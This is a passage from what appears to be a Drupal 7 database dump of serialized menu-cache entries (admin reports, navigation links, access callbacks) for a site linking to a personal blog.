pages.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"2\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"405\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:23:\"statistics_top_visitors\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:22:\"admin/reports/visitors\";s:5:\"title\";s:12:\"Top visitors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View visitors that hit many pages.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:411;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"411\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:22:\"admin/reports/access/%\";s:11:\"router_path\";s:22:\"admin/reports/access/%\";s:10:\"link_title\";s:7:\"Details\";s:7:\"options\";s:66:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:16:\"View access log.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"411\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:12:\"a:1:{i:3;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:21:\"statistics_access_log\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:3;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:22:\"admin/reports/access/%\";s:5:\"title\";s:7:\"Details\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:16:\"View access log.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:416;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"416\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:21:\"admin/reports/adsense\";s:11:\"router_path\";s:21:\"admin/reports/adsense\";s:10:\"link_title\";s:14:\"AdSense clicks\";s:7:\"options\";s:71:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:21:\"Track AdSense clicks.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"416\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:29:\"a:1:{i:0;s:11:\"view clicks\";}\";s:13:\"page_callback\";s:17:\"adsense_click_log\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/adsense\";s:5:\"title\";s:14:\"AdSense clicks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:21:\"Track AdSense clicks.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:346;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"346\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:26:\"http://www.ollital.de/blog\";s:11:\"router_path\";s:0:\"\";s:10:\"link_title\";s:4:\"Blog\";s:7:\"options\";s:58:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:9:\"Mein Blog\";}}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"1\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"1\";s:2:\"p1\";s:3:\"346\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";N;s:16:\"to_arg_functions\";N;s:15:\"access_callback\";N;s:16:\"access_arguments\";N;s:13:\"page_callback\";N;s:14:\"page_arguments\";N;s:17:\"delivery_callback\";N;s:10:\"tab_parent\";N;s:8:\"tab_root\";N;s:5:\"title\";N;s:14:\"title_callback\";N;s:15:\"title_arguments\";N;s:14:\"theme_callback\";N;s:15:\"theme_arguments\";N;s:4:\"type\";N;s:11:\"description\";N;s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}s:10:\"node_links\";a:0:{}}',0,1445543754,1),('links:navigation:page:node/3:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:2:{i:0;i:0;i:5;s:1:\"5\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:5;s:1:\"5\";}}',0,1445013096,1),('links:navigation:page:node/4:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:2:{i:0;i:0;i:5;s:1:\"5\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:5;s:1:\"5\";}}',0,1444940212,1),('links:navigation:page:node/5:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:2:{i:0;i:0;i:5;s:1:\"5\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:5;s:1:\"5\";}}',0,1444940217,1),('links:navigation:page:node/6:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:2:{i:0;i:0;i:5;s:1:\"5\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:5;s:1:\"5\";}}',0,1444940220,1),('links:navigation:page:node/7:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:2:{i:0;i:0;i:5;s:1:\"5\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:5;s:1:\"5\";}}',0,1444940233,1),('links:navigation:page:node/add:en:0:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1445104350,1),('links:navigation:page:node:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1444940208,1),('links:navigation:page:taxonomy/term/1:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:2:{i:0;i:0;i:27;s:2:\"27\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:27;s:2:\"27\";}}',0,1445085523,1),('links:navigation:page:taxonomy/term/2:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:2:{i:0;i:0;i:27;s:2:\"27\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:27;s:2:\"27\";}}',0,1445085534,1),('links:navigation:page:taxonomy/term/3:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:2:{i:0;i:0;i:27;s:2:\"27\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:27;s:2:\"27\";}}',0,1444995772,1),('links:navigation:page:user/1:en:0:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1445257195,1),('links:navigation:page:user/login:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1445003119,1),('links:navigation:page:user/password:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1444973651,1),('links:navigation:page:user/register:en:0:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1445010704,1),('links:navigation:page:user:en:1:0','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1445023482,1),('links:navigation:tree-data:en:338a30520d56f183e5d7e8b4748164a027d632f9e0d89c48e60dde597af09cb1','a:2:{s:4:\"tree\";a:10:{i:3;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:1:\"3\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:9:\"comment/%\";s:11:\"router_path\";s:9:\"comment/%\";s:10:\"link_title\";s:17:\"Comment permalink\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"3\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:12:\"a:1:{i:1;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:33:\"a:1:{i:0;s:15:\"access comments\";}\";s:13:\"page_callback\";s:17:\"comment_permalink\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:9:\"comment/%\";s:5:\"title\";s:17:\"Comment permalink\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:4;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:1:\"4\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:11:\"filter/tips\";s:11:\"router_path\";s:11:\"filter/tips\";s:10:\"link_title\";s:12:\"Compose tips\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"4\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:1:\"1\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:16:\"filter_tips_long\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:11:\"filter/tips\";s:5:\"title\";s:12:\"Compose tips\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:2:\"20\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:5;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:1:\"5\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"node/%\";s:11:\"router_path\";s:6:\"node/%\";s:10:\"link_title\";s:0:\"\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"5\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:6;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:1:\"6\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:8:\"node/add\";s:11:\"router_path\";s:8:\"node/add\";s:10:\"link_title\";s:11:\"Add content\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"6\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:16:\"_node_add_access\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:13:\"node_add_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:8:\"node/add\";s:5:\"title\";s:11:\"Add content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:17;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:2:\"17\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"user/%\";s:11:\"router_path\";s:6:\"user/%\";s:10:\"link_title\";s:10:\"My account\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:2:\"17\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"user_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:16:\"user_view_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:13:\"page_callback\";s:14:\"user_view_page\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"user/%\";s:5:\"title\";s:10:\"My account\";s:14:\"title_callback\";s:15:\"user_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:23;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:2:\"23\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:15:\"comment/reply/%\";s:11:\"router_path\";s:15:\"comment/reply/%\";s:10:\"link_title\";s:15:\"Add new comment\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:2:\"23\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:2;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:2;}\";s:13:\"page_callback\";s:13:\"comment_reply\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:2;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"comment/reply/%\";s:5:\"title\";s:15:\"Add new comment\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:27;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:2:\"27\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:15:\"taxonomy/term/%\";s:11:\"router_path\";s:15:\"taxonomy/term/%\";s:10:\"link_title\";s:13:\"Taxonomy term\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:2:\"27\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:36:\"a:1:{i:2;s:18:\"taxonomy_term_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:32:\"a:1:{i:0;s:14:\"access content\";}\";s:13:\"page_callback\";s:18:\"taxonomy_term_page\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:2;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"taxonomy/term/%\";s:5:\"title\";s:13:\"Taxonomy term\";s:14:\"title_callback\";s:19:\"taxonomy_term_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:2;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:2:{i:87;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"navigation\";s:4:\"mlid\";s:2:\"87\";s:4:\"plid\";s:2:\"27\";s:9:\"link_path\";s:20:\"taxonomy/term/%/edit\";s:11:\"router_path\";s:20:\"taxonomy/term/%/edit\";s:10:\"link_title\";s:4:\"Edit\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:2:\"27\";s:2:\"p2\";s:2:\"87\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:36:\"a:1:{i:2;s:18:\"taxonomy_term_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:25:\"taxonomy_term_edit_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i: